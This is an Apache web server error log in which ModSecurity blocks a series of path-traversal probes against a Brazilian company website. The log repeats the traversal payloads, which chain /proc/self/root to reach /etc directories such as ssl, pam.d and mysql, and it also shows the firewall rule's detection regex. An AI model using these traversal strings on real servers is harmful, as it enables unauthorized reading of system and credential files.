https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:45.360362 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:24:46.102950 2026] [:error] [pid 21563:tid 140411699963648] [client 74.7.241.31:48242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNfkpm7ZmxKZTM4bZqigAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:50.964980 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:57088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNguoXxyEfFpUF8f8y0gAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:24:52.111379 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:44446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNhMdf6f5d65gmYZSgKQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:55.421965 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:44446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNh8df6f5d65gmYZSgKgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:00.611817 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:56258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNjEpm7ZmxKZTM4bZqkQAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:05.837270 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:56264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNkeoXxyEfFpUF8f8y2wAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:10.052968 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56192] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:25:10.492414 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:42944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNlkpm7ZmxKZTM4bZqmQAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:11.363760 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:39032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNl_-YZRR_7pZ7nDKyRAAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:15.924885 2026] [:error] [pid 20435:tid 140411691570944] [client 74.7.241.31:42946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNm5JaM1-0uhhUQJM-7wAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:16.662386 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.243.128:53664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNnEpm7ZmxKZTM4bZqngAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:20.036428 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:40004] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNoOoXxyEfFpUF8f8y3wAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:20.399992 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:50276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNoPqxLDW4GITHUkSOiwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:25.360005 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:40020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNpfqxLDW4GITHUkSOjAAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:26.802711 2026] [core:alert] [pid 21563:tid 140411699963648] [client 74.7.243.128:50280] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/www/html
[Thu Mar 19 16:25:27.864040 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.243.128:50288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNp0pm7ZmxKZTM4bZqpQAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:30.121890 2026] [:error] [pid 21563:tid 140411699963648] [client 74.7.241.31:55160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNqkpm7ZmxKZTM4bZqpgAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:34.593819 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:25:34.756813 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:57752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNrvqxLDW4GITHUkSOjgAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:37.309640 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:55162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNsUpm7ZmxKZTM4bZqqwAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:38.895506 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.243.128:57764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNskpm7ZmxKZTM4bZqrQAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:40.765978 2026] [:error] [pid 20435:tid 140411691570944] [client 74.7.243.128:40516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNtJJaM1-0uhhUQJM-9wAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:42.483575 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:38290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNtkpm7ZmxKZTM4bZqsAAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
